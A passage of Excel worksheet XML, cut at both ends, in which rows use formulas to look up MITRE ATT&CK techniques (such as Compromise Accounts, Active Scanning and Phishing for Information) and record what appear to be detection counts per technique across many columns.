      <c r="AS66" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT66" s="12">
        <v>0</v>
      </c>
      <c r="AU66" s="13">
        <v>0</v>
      </c>
      <c r="AV66" s="394">
        <v>0</v>
      </c>
      <c r="AW66" s="392">
        <v>0</v>
      </c>
      <c r="AX66" s="392">
        <v>0</v>
      </c>
      <c r="AY66" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ66" s="4">
        <v>0</v>
      </c>
      <c r="BA66" s="16">
        <v>0</v>
      </c>
      <c r="BB66" s="394">
        <v>0</v>
      </c>
      <c r="BC66" s="292">
        <v>1</v>
      </c>
      <c r="BD66" s="322">
        <v>1</v>
      </c>
      <c r="BE66" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF66" s="12">
        <v>1</v>
      </c>
      <c r="BG66" s="13">
        <v>1</v>
      </c>
      <c r="BH66" s="394">
        <v>1</v>
      </c>
      <c r="BI66" s="292">
        <v>0</v>
      </c>
      <c r="BJ66" s="322">
        <v>0</v>
      </c>
      <c r="BK66" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL66" s="12">
        <v>0</v>
      </c>
      <c r="BM66" s="13">
        <v>0</v>
      </c>
      <c r="BN66" s="394">
        <v>0</v>
      </c>
      <c r="BO66" s="292">
        <v>2</v>
      </c>
      <c r="BP66" s="322">
        <v>2</v>
      </c>
      <c r="BQ66" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR66" s="12">
        <v>0</v>
      </c>
      <c r="BS66" s="12">
        <v>2</v>
      </c>
      <c r="BT66" s="13">
        <v>1</v>
      </c>
      <c r="BU66" s="394">
        <v>1</v>
      </c>
      <c r="BV66" s="292">
        <v>0</v>
      </c>
      <c r="BW66" s="322">
        <v>0</v>
      </c>
      <c r="BX66" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY66" s="12">
        <v>0</v>
      </c>
      <c r="BZ66" s="13">
        <v>0</v>
      </c>
      <c r="CA66" s="394">
        <v>0</v>
      </c>
      <c r="CB66" s="292">
        <v>0</v>
      </c>
      <c r="CC66" s="322">
        <v>0</v>
      </c>
      <c r="CD66" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE66" s="12">
        <v>0</v>
      </c>
      <c r="CF66" s="12">
        <v>0</v>
      </c>
      <c r="CG66" s="13">
        <v>0</v>
      </c>
      <c r="CH66" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:98" ht="15" customHeight="1">
      <c r="A67" s="4">
        <f t="shared" si="13"/>
        <v>65</v>
      </c>
      <c r="B67" s="4" t="str">
        <f>IFERROR(VLOOKUP(A67,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1585</v>
      </c>
      <c r="C67" s="4" t="str">
        <f>IFERROR(VLOOKUP(B67,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Establish Accounts</v>
      </c>
      <c r="D67" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B67)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>129</v>
      </c>
      <c r="F67" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (129)</v>
      </c>
      <c r="G67" s="292">
        <v>78</v>
      </c>
      <c r="H67" s="322">
        <v>62</v>
      </c>
      <c r="I67" s="322" t="str">
        <f t="shared" si="0"/>
        <v>62 (78)</v>
      </c>
      <c r="J67" s="12">
        <v>3</v>
      </c>
      <c r="K67" s="13">
        <v>1</v>
      </c>
      <c r="L67" s="394">
        <v>59</v>
      </c>
      <c r="M67" s="322">
        <v>0</v>
      </c>
      <c r="N67" s="322">
        <v>0</v>
      </c>
      <c r="O67" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P67" s="12">
        <v>0</v>
      </c>
      <c r="Q67" s="13">
        <v>0</v>
      </c>
      <c r="R67" s="394">
        <v>0</v>
      </c>
      <c r="S67" s="292">
        <v>78</v>
      </c>
      <c r="T67" s="322">
        <v>62</v>
      </c>
      <c r="U67" s="322" t="str">
        <f t="shared" si="2"/>
        <v>62 (78)</v>
      </c>
      <c r="V67" s="12">
        <v>3</v>
      </c>
      <c r="W67" s="13">
        <v>1</v>
      </c>
      <c r="X67" s="394">
        <v>59</v>
      </c>
      <c r="Y67" s="392">
        <v>78</v>
      </c>
      <c r="Z67" s="392">
        <v>62</v>
      </c>
      <c r="AA67" s="322" t="str">
        <f t="shared" si="3"/>
        <v>62 (78)</v>
      </c>
      <c r="AB67" s="392">
        <v>3</v>
      </c>
      <c r="AC67" s="16">
        <v>1</v>
      </c>
      <c r="AD67" s="394">
        <v>59</v>
      </c>
      <c r="AE67" s="392">
        <v>3</v>
      </c>
      <c r="AF67" s="392">
        <v>3</v>
      </c>
      <c r="AG67" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (3)</v>
      </c>
      <c r="AH67" s="392">
        <v>1</v>
      </c>
      <c r="AI67" s="16">
        <v>1</v>
      </c>
      <c r="AJ67" s="394">
        <v>3</v>
      </c>
      <c r="AK67" s="392">
        <v>81</v>
      </c>
      <c r="AL67" s="392">
        <v>65</v>
      </c>
      <c r="AM67" s="322" t="str">
        <f t="shared" si="5"/>
        <v>65 (81)</v>
      </c>
      <c r="AN67" s="392">
        <v>4</v>
      </c>
      <c r="AO67" s="16">
        <v>1</v>
      </c>
      <c r="AP67" s="394">
        <v>59</v>
      </c>
      <c r="AQ67" s="292">
        <v>0</v>
      </c>
      <c r="AR67" s="322">
        <v>0</v>
      </c>
      <c r="AS67" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT67" s="12">
        <v>0</v>
      </c>
      <c r="AU67" s="13">
        <v>0</v>
      </c>
      <c r="AV67" s="394">
        <v>0</v>
      </c>
      <c r="AW67" s="392">
        <v>0</v>
      </c>
      <c r="AX67" s="392">
        <v>0</v>
      </c>
      <c r="AY67" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ67" s="4">
        <v>0</v>
      </c>
      <c r="BA67" s="16">
        <v>0</v>
      </c>
      <c r="BB67" s="394">
        <v>0</v>
      </c>
      <c r="BC67" s="292">
        <v>78</v>
      </c>
      <c r="BD67" s="322">
        <v>62</v>
      </c>
      <c r="BE67" s="322" t="str">
        <f t="shared" si="8"/>
        <v>62 (78)</v>
      </c>
      <c r="BF67" s="12">
        <v>3</v>
      </c>
      <c r="BG67" s="13">
        <v>1</v>
      </c>
      <c r="BH67" s="394">
        <v>59</v>
      </c>
      <c r="BI67" s="292">
        <v>0</v>
      </c>
      <c r="BJ67" s="322">
        <v>0</v>
      </c>
      <c r="BK67" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL67" s="12">
        <v>0</v>
      </c>
      <c r="BM67" s="13">
        <v>0</v>
      </c>
      <c r="BN67" s="394">
        <v>0</v>
      </c>
      <c r="BO67" s="292">
        <v>0</v>
      </c>
      <c r="BP67" s="322">
        <v>0</v>
      </c>
      <c r="BQ67" s="322" t="str">
        <f t="shared" si="10"/>
        <v>0 (0)</v>
      </c>
      <c r="BR67" s="12">
        <v>0</v>
      </c>
      <c r="BS67" s="12">
        <v>0</v>
      </c>
      <c r="BT67" s="13">
        <v>0</v>
      </c>
      <c r="BU67" s="394">
        <v>0</v>
      </c>
      <c r="BV67" s="292">
        <v>0</v>
      </c>
      <c r="BW67" s="322">
        <v>0</v>
      </c>
      <c r="BX67" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY67" s="12">
        <v>0</v>
      </c>
      <c r="BZ67" s="13">
        <v>0</v>
      </c>
      <c r="CA67" s="394">
        <v>0</v>
      </c>
      <c r="CB67" s="292">
        <v>135</v>
      </c>
      <c r="CC67" s="322">
        <v>124</v>
      </c>
      <c r="CD67" s="322" t="str">
        <f t="shared" si="12"/>
        <v>124 (135)</v>
      </c>
      <c r="CE67" s="12">
        <v>0</v>
      </c>
      <c r="CF67" s="12">
        <v>1</v>
      </c>
      <c r="CG67" s="13">
        <v>1</v>
      </c>
      <c r="CH67" s="394">
        <v>124</v>
      </c>
    </row>
    <row r="68" spans="1:98" ht="15" customHeight="1">
      <c r="A68" s="4">
        <f t="shared" si="13"/>
        <v>66</v>
      </c>
      <c r="B68" s="4" t="str">
        <f>IFERROR(VLOOKUP(A68,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1586</v>
      </c>
      <c r="C68" s="4" t="str">
        <f>IFERROR(VLOOKUP(B68,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Compromise Accounts</v>
      </c>
      <c r="D68" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B68)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>6951</v>
      </c>
      <c r="F68" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (6951)</v>
      </c>
      <c r="G68" s="292">
        <v>21291</v>
      </c>
      <c r="H68" s="322">
        <v>5739</v>
      </c>
      <c r="I68" s="322" t="str">
        <f t="shared" ref="I68:I78" si="15">H68 &amp; " (" &amp; G68 &amp; ")"</f>
        <v>5739 (21291)</v>
      </c>
      <c r="J68" s="12">
        <v>1</v>
      </c>
      <c r="K68" s="13">
        <v>1</v>
      </c>
      <c r="L68" s="394">
        <v>5739</v>
      </c>
      <c r="M68" s="322">
        <v>3652</v>
      </c>
      <c r="N68" s="322">
        <v>2147</v>
      </c>
      <c r="O68" s="322" t="str">
        <f t="shared" ref="O68:O78" si="16">N68 &amp; " (" &amp; M68 &amp; ")"</f>
        <v>2147 (3652)</v>
      </c>
      <c r="P68" s="12">
        <v>15</v>
      </c>
      <c r="Q68" s="13">
        <v>1</v>
      </c>
      <c r="R68" s="394">
        <v>1253</v>
      </c>
      <c r="S68" s="292">
        <v>24943</v>
      </c>
      <c r="T68" s="322">
        <v>7886</v>
      </c>
      <c r="U68" s="322" t="str">
        <f t="shared" ref="U68:U78" si="17">T68 &amp; " (" &amp; S68 &amp; ")"</f>
        <v>7886 (24943)</v>
      </c>
      <c r="V68" s="12">
        <v>16</v>
      </c>
      <c r="W68" s="13">
        <v>1</v>
      </c>
      <c r="X68" s="394">
        <v>5955</v>
      </c>
      <c r="Y68" s="392">
        <v>343298</v>
      </c>
      <c r="Z68" s="392">
        <v>12229</v>
      </c>
      <c r="AA68" s="322" t="str">
        <f t="shared" ref="AA68:AA78" si="18">Z68 &amp; " (" &amp; Y68 &amp; ")"</f>
        <v>12229 (343298)</v>
      </c>
      <c r="AB68" s="392">
        <v>50</v>
      </c>
      <c r="AC68" s="16">
        <v>1</v>
      </c>
      <c r="AD68" s="394">
        <v>6166</v>
      </c>
      <c r="AE68" s="392">
        <v>28291</v>
      </c>
      <c r="AF68" s="392">
        <v>10071</v>
      </c>
      <c r="AG68" s="322" t="str">
        <f t="shared" ref="AG68:AG78" si="19">AF68 &amp; " (" &amp; AE68 &amp; ")"</f>
        <v>10071 (28291)</v>
      </c>
      <c r="AH68" s="392">
        <v>27</v>
      </c>
      <c r="AI68" s="16">
        <v>1</v>
      </c>
      <c r="AJ68" s="394">
        <v>6950</v>
      </c>
      <c r="AK68" s="392">
        <v>361925</v>
      </c>
      <c r="AL68" s="392">
        <v>19242</v>
      </c>
      <c r="AM68" s="322" t="str">
        <f t="shared" ref="AM68:AM78" si="20">AL68 &amp; " (" &amp; AK68 &amp; ")"</f>
        <v>19242 (361925)</v>
      </c>
      <c r="AN68" s="392">
        <v>77</v>
      </c>
      <c r="AO68" s="16">
        <v>1</v>
      </c>
      <c r="AP68" s="394">
        <v>6950</v>
      </c>
      <c r="AQ68" s="292">
        <v>0</v>
      </c>
      <c r="AR68" s="322">
        <v>0</v>
      </c>
      <c r="AS68" s="322" t="str">
        <f t="shared" ref="AS68:AS78" si="21">AR68 &amp; " (" &amp; AQ68 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AT68" s="12">
        <v>0</v>
      </c>
      <c r="AU68" s="13">
        <v>0</v>
      </c>
      <c r="AV68" s="394">
        <v>0</v>
      </c>
      <c r="AW68" s="392">
        <v>10190</v>
      </c>
      <c r="AX68" s="392">
        <v>6728</v>
      </c>
      <c r="AY68" s="322" t="str">
        <f t="shared" ref="AY68:AY78" si="22">AX68 &amp; " (" &amp; AW68 &amp; ")"</f>
        <v>6728 (10190)</v>
      </c>
      <c r="AZ68" s="4">
        <v>46</v>
      </c>
      <c r="BA68" s="16">
        <v>1</v>
      </c>
      <c r="BB68" s="394">
        <v>3231</v>
      </c>
      <c r="BC68" s="292">
        <v>35133</v>
      </c>
      <c r="BD68" s="322">
        <v>14614</v>
      </c>
      <c r="BE68" s="322" t="str">
        <f t="shared" ref="BE68:BE78" si="23">BD68 &amp; " (" &amp; BC68 &amp; ")"</f>
        <v>14614 (35133)</v>
      </c>
      <c r="BF68" s="12">
        <v>62</v>
      </c>
      <c r="BG68" s="13">
        <v>1</v>
      </c>
      <c r="BH68" s="394">
        <v>6351</v>
      </c>
      <c r="BI68" s="292">
        <v>305</v>
      </c>
      <c r="BJ68" s="322">
        <v>154</v>
      </c>
      <c r="BK68" s="322" t="str">
        <f t="shared" ref="BK68:BK78" si="24">BJ68 &amp; " (" &amp; BI68 &amp; ")"</f>
        <v>154 (305)</v>
      </c>
      <c r="BL68" s="12">
        <v>2</v>
      </c>
      <c r="BM68" s="13">
        <v>1</v>
      </c>
      <c r="BN68" s="394">
        <v>154</v>
      </c>
      <c r="BO68" s="292">
        <v>14206</v>
      </c>
      <c r="BP68" s="322">
        <v>14055</v>
      </c>
      <c r="BQ68" s="322" t="str">
        <f t="shared" ref="BQ68:BQ78" si="25">BP68 &amp; " (" &amp; BO68 &amp; ")"</f>
        <v>14055 (14206)</v>
      </c>
      <c r="BR68" s="12">
        <v>2</v>
      </c>
      <c r="BS68" s="12">
        <v>3</v>
      </c>
      <c r="BT68" s="13">
        <v>1</v>
      </c>
      <c r="BU68" s="394">
        <v>6951</v>
      </c>
      <c r="BV68" s="292">
        <v>0</v>
      </c>
      <c r="BW68" s="322">
        <v>0</v>
      </c>
      <c r="BX68" s="322" t="str">
        <f t="shared" ref="BX68:BX78" si="26">BW68 &amp; " (" &amp; BV68 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BY68" s="12">
        <v>0</v>
      </c>
      <c r="BZ68" s="13">
        <v>0</v>
      </c>
      <c r="CA68" s="394">
        <v>0</v>
      </c>
      <c r="CB68" s="292">
        <v>696786</v>
      </c>
      <c r="CC68" s="322">
        <v>6941</v>
      </c>
      <c r="CD68" s="322" t="str">
        <f t="shared" ref="CD68:CD78" si="27">CC68 &amp; " (" &amp; CB68 &amp; ")"</f>
        <v>6941 (696786)</v>
      </c>
      <c r="CE68" s="12">
        <v>0</v>
      </c>
      <c r="CF68" s="12">
        <v>1</v>
      </c>
      <c r="CG68" s="13">
        <v>1</v>
      </c>
      <c r="CH68" s="394">
        <v>6941</v>
      </c>
    </row>
    <row r="69" spans="1:98" ht="15" customHeight="1">
      <c r="A69" s="4">
        <f t="shared" ref="A69:A78" si="28">A68+1</f>
        <v>67</v>
      </c>
      <c r="B69" s="4" t="str">
        <f>IFERROR(VLOOKUP(A69,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1589</v>
      </c>
      <c r="C69" s="4" t="str">
        <f>IFERROR(VLOOKUP(B69,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Gather Victim Identity Information</v>
      </c>
      <c r="D69" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B69)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F69" s="286" t="str">
        <f t="shared" ref="F69:F78" si="29">D69&amp;" ("&amp;E69&amp;")"</f>
        <v>1 (7)</v>
      </c>
      <c r="G69" s="292">
        <v>14</v>
      </c>
      <c r="H69" s="322">
        <v>7</v>
      </c>
      <c r="I69" s="322" t="str">
        <f t="shared" si="15"/>
        <v>7 (14)</v>
      </c>
      <c r="J69" s="12">
        <v>1</v>
      </c>
      <c r="K69" s="13">
        <v>1</v>
      </c>
      <c r="L69" s="394">
        <v>7</v>
      </c>
      <c r="M69" s="322">
        <v>0</v>
      </c>
      <c r="N69" s="322">
        <v>0</v>
      </c>
      <c r="O69" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P69" s="12">
        <v>0</v>
      </c>
      <c r="Q69" s="13">
        <v>0</v>
      </c>
      <c r="R69" s="394">
        <v>0</v>
      </c>
      <c r="S69" s="292">
        <v>14</v>
      </c>
      <c r="T69" s="322">
        <v>7</v>
      </c>
      <c r="U69" s="322" t="str">
        <f t="shared" si="17"/>
        <v>7 (14)</v>
      </c>
      <c r="V69" s="12">
        <v>1</v>
      </c>
      <c r="W69" s="13">
        <v>1</v>
      </c>
      <c r="X69" s="394">
        <v>7</v>
      </c>
      <c r="Y69" s="392">
        <v>14</v>
      </c>
      <c r="Z69" s="392">
        <v>7</v>
      </c>
      <c r="AA69" s="322" t="str">
        <f t="shared" si="18"/>
        <v>7 (14)</v>
      </c>
      <c r="AB69" s="392">
        <v>1</v>
      </c>
      <c r="AC69" s="16">
        <v>1</v>
      </c>
      <c r="AD69" s="394">
        <v>7</v>
      </c>
      <c r="AE69" s="392">
        <v>1</v>
      </c>
      <c r="AF69" s="392">
        <v>1</v>
      </c>
      <c r="AG69" s="322" t="str">
        <f t="shared" si="19"/>
        <v>1 (1)</v>
      </c>
      <c r="AH69" s="392">
        <v>1</v>
      </c>
      <c r="AI69" s="16">
        <v>1</v>
      </c>
      <c r="AJ69" s="394">
        <v>1</v>
      </c>
      <c r="AK69" s="392">
        <v>15</v>
      </c>
      <c r="AL69" s="392">
        <v>8</v>
      </c>
      <c r="AM69" s="322" t="str">
        <f t="shared" si="20"/>
        <v>8 (15)</v>
      </c>
      <c r="AN69" s="392">
        <v>2</v>
      </c>
      <c r="AO69" s="16">
        <v>1</v>
      </c>
      <c r="AP69" s="394">
        <v>7</v>
      </c>
      <c r="AQ69" s="292">
        <v>0</v>
      </c>
      <c r="AR69" s="322">
        <v>0</v>
      </c>
      <c r="AS69" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT69" s="12">
        <v>0</v>
      </c>
      <c r="AU69" s="13">
        <v>0</v>
      </c>
      <c r="AV69" s="394">
        <v>0</v>
      </c>
      <c r="AW69" s="392">
        <v>0</v>
      </c>
      <c r="AX69" s="392">
        <v>0</v>
      </c>
      <c r="AY69" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ69" s="4">
        <v>0</v>
      </c>
      <c r="BA69" s="16">
        <v>0</v>
      </c>
      <c r="BB69" s="394">
        <v>0</v>
      </c>
      <c r="BC69" s="292">
        <v>14</v>
      </c>
      <c r="BD69" s="322">
        <v>7</v>
      </c>
      <c r="BE69" s="322" t="str">
        <f t="shared" si="23"/>
        <v>7 (14)</v>
      </c>
      <c r="BF69" s="12">
        <v>1</v>
      </c>
      <c r="BG69" s="13">
        <v>1</v>
      </c>
      <c r="BH69" s="394">
        <v>7</v>
      </c>
      <c r="BI69" s="292">
        <v>0</v>
      </c>
      <c r="BJ69" s="322">
        <v>0</v>
      </c>
      <c r="BK69" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL69" s="12">
        <v>0</v>
      </c>
      <c r="BM69" s="13">
        <v>0</v>
      </c>
      <c r="BN69" s="394">
        <v>0</v>
      </c>
      <c r="BO69" s="292">
        <v>7</v>
      </c>
      <c r="BP69" s="322">
        <v>7</v>
      </c>
      <c r="BQ69" s="322" t="str">
        <f t="shared" si="25"/>
        <v>7 (7)</v>
      </c>
      <c r="BR69" s="12">
        <v>0</v>
      </c>
      <c r="BS69" s="12">
        <v>1</v>
      </c>
      <c r="BT69" s="13">
        <v>1</v>
      </c>
      <c r="BU69" s="394">
        <v>7</v>
      </c>
      <c r="BV69" s="292">
        <v>0</v>
      </c>
      <c r="BW69" s="322">
        <v>0</v>
      </c>
      <c r="BX69" s="322" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY69" s="12">
        <v>0</v>
      </c>
      <c r="BZ69" s="13">
        <v>0</v>
      </c>
      <c r="CA69" s="394">
        <v>0</v>
      </c>
      <c r="CB69" s="292">
        <v>0</v>
      </c>
      <c r="CC69" s="322">
        <v>0</v>
      </c>
      <c r="CD69" s="322" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE69" s="12">
        <v>0</v>
      </c>
      <c r="CF69" s="12">
        <v>0</v>
      </c>
      <c r="CG69" s="13">
        <v>0</v>
      </c>
      <c r="CH69" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:98" ht="15" customHeight="1">
      <c r="A70" s="4">
        <f t="shared" si="28"/>
        <v>68</v>
      </c>
      <c r="B70" s="4" t="str">
        <f>IFERROR(VLOOKUP(A70,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1595</v>
      </c>
      <c r="C70" s="4" t="str">
        <f>IFERROR(VLOOKUP(B70,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Active Scanning</v>
      </c>
      <c r="D70" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B70)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2574</v>
      </c>
      <c r="F70" s="286" t="str">
        <f t="shared" si="29"/>
        <v>3 (2574)</v>
      </c>
      <c r="G70" s="292">
        <v>187</v>
      </c>
      <c r="H70" s="322">
        <v>187</v>
      </c>
      <c r="I70" s="322" t="str">
        <f t="shared" si="15"/>
        <v>187 (187)</v>
      </c>
      <c r="J70" s="12">
        <v>2</v>
      </c>
      <c r="K70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="L70" s="394">
        <v>187</v>
      </c>
      <c r="M70" s="322">
        <v>57</v>
      </c>
      <c r="N70" s="322">
        <v>56</v>
      </c>
      <c r="O70" s="322" t="str">
        <f t="shared" si="16"/>
        <v>56 (57)</v>
      </c>
      <c r="P70" s="12">
        <v>27</v>
      </c>
      <c r="Q70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="R70" s="394">
        <v>39</v>
      </c>
      <c r="S70" s="292">
        <v>244</v>
      </c>
      <c r="T70" s="322">
        <v>243</v>
      </c>
      <c r="U70" s="322" t="str">
        <f t="shared" si="17"/>
        <v>243 (244)</v>
      </c>
      <c r="V70" s="12">
        <v>29</v>
      </c>
      <c r="W70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="X70" s="394">
        <v>212</v>
      </c>
      <c r="Y70" s="392">
        <v>5284</v>
      </c>
      <c r="Z70" s="392">
        <v>887</v>
      </c>
      <c r="AA70" s="322" t="str">
        <f t="shared" si="18"/>
        <v>887 (5284)</v>
      </c>
      <c r="AB70" s="392">
        <v>60</v>
      </c>
      <c r="AC70" s="16">
        <v>1</v>
      </c>
      <c r="AD70" s="394">
        <v>454</v>
      </c>
      <c r="AE70" s="392">
        <v>362</v>
      </c>
      <c r="AF70" s="392">
        <v>287</v>
      </c>
      <c r="AG70" s="322" t="str">
        <f t="shared" si="19"/>
        <v>287 (362)</v>
      </c>
      <c r="AH70" s="392">
        <v>44</v>
      </c>
      <c r="AI70" s="16">
        <v>1</v>
      </c>
      <c r="AJ70" s="394">
        <v>185</v>
      </c>
      <c r="AK70" s="392">
        <v>5646</v>
      </c>
      <c r="AL70" s="392">
        <v>1174</v>
      </c>
      <c r="AM70" s="322" t="str">
        <f t="shared" si="20"/>
        <v>1174 (5646)</v>
      </c>
      <c r="AN70" s="392">
        <v>104</v>
      </c>
      <c r="AO70" s="16">
        <v>1</v>
      </c>
      <c r="AP70" s="394">
        <v>471</v>
      </c>
      <c r="AQ70" s="292">
        <v>0</v>
      </c>
      <c r="AR70" s="322">
        <v>0</v>
      </c>
      <c r="AS70" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT70" s="12">
        <v>0</v>
      </c>
      <c r="AU70" s="13">
        <v>0</v>
      </c>
      <c r="AV70" s="394">
        <v>0</v>
      </c>
      <c r="AW70" s="392">
        <v>67</v>
      </c>
      <c r="AX70" s="392">
        <v>66</v>
      </c>
      <c r="AY70" s="322" t="str">
        <f t="shared" si="22"/>
        <v>66 (67)</v>
      </c>
      <c r="AZ70" s="4">
        <v>46</v>
      </c>
      <c r="BA70" s="16">
        <v>0.66666666666666663</v>
      </c>
      <c r="BB70" s="394">
        <v>41</v>
      </c>
      <c r="BC70" s="292">
        <v>311</v>
      </c>
      <c r="BD70" s="322">
        <v>309</v>
      </c>
      <c r="BE70" s="322" t="str">
        <f t="shared" si="23"/>
        <v>309 (311)</v>
      </c>
      <c r="BF70" s="12">
        <v>75</v>
      </c>
      <c r="BG70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BH70" s="394">
        <v>217</v>
      </c>
      <c r="BI70" s="292">
        <v>2</v>
      </c>
      <c r="BJ70" s="322">
        <v>2</v>
      </c>
      <c r="BK70" s="322" t="str">
        <f t="shared" si="24"/>
        <v>2 (2)</v>
      </c>
      <c r="BL70" s="12">
        <v>2</v>
      </c>
      <c r="BM70" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="BN70" s="394">
        <v>2</v>
      </c>
      <c r="BO70" s="292">
        <v>469</v>
      </c>
      <c r="BP70" s="322">
        <v>465</v>
      </c>
      <c r="BQ70" s="322" t="str">
        <f t="shared" si="25"/>
        <v>465 (469)</v>
      </c>
      <c r="BR70" s="12">
        <v>2</v>
      </c>
      <c r="BS70" s="12">
        <v>11</v>
      </c>
      <c r="BT70" s="13">
        <v>1</v>
      </c>
      <c r="BU70" s="394">
        <v>461</v>
      </c>
      <c r="BV70" s="292">
        <v>10</v>
      </c>
      <c r="BW70" s="322">
        <v>10</v>
      </c>
      <c r="BX70" s="322" t="str">
        <f t="shared" si="26"/>
        <v>10 (10)</v>
      </c>
      <c r="BY70" s="12">
        <v>2</v>
      </c>
      <c r="BZ70" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="CA70" s="394">
        <v>10</v>
      </c>
      <c r="CB70" s="292">
        <v>4740</v>
      </c>
      <c r="CC70" s="322">
        <v>445</v>
      </c>
      <c r="CD70" s="322" t="str">
        <f t="shared" si="27"/>
        <v>445 (4740)</v>
      </c>
      <c r="CE70" s="12">
        <v>0</v>
      </c>
      <c r="CF70" s="12">
        <v>4</v>
      </c>
      <c r="CG70" s="13">
        <v>1</v>
      </c>
      <c r="CH70" s="394">
        <v>445</v>
      </c>
    </row>
    <row r="71" spans="1:98" ht="15" customHeight="1">
      <c r="A71" s="4">
        <f t="shared" si="28"/>
        <v>69</v>
      </c>
      <c r="B71" s="4" t="str">
        <f>IFERROR(VLOOKUP(A71,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1598</v>
      </c>
      <c r="C71" s="4" t="str">
        <f>IFERROR(VLOOKUP(B71,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Phishing for Information</v>
      </c>
      <c r="D71" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B71)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>59</v>
      </c>
      <c r="F71" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (59)</v>
      </c>
      <c r="G71" s="292">
        <v>3</v>
      </c>
      <c r="H71" s="322">
        <v>1</v>
      </c>
      <c r="I71" s="322" t="str">
        <f t="shared" si="15"/>
        <v>1 (3)</v>
      </c>
      <c r="J71" s="12">
        <v>1</v>
      </c>
      <c r="K71" s="13">
        <v>1</v>
      </c>
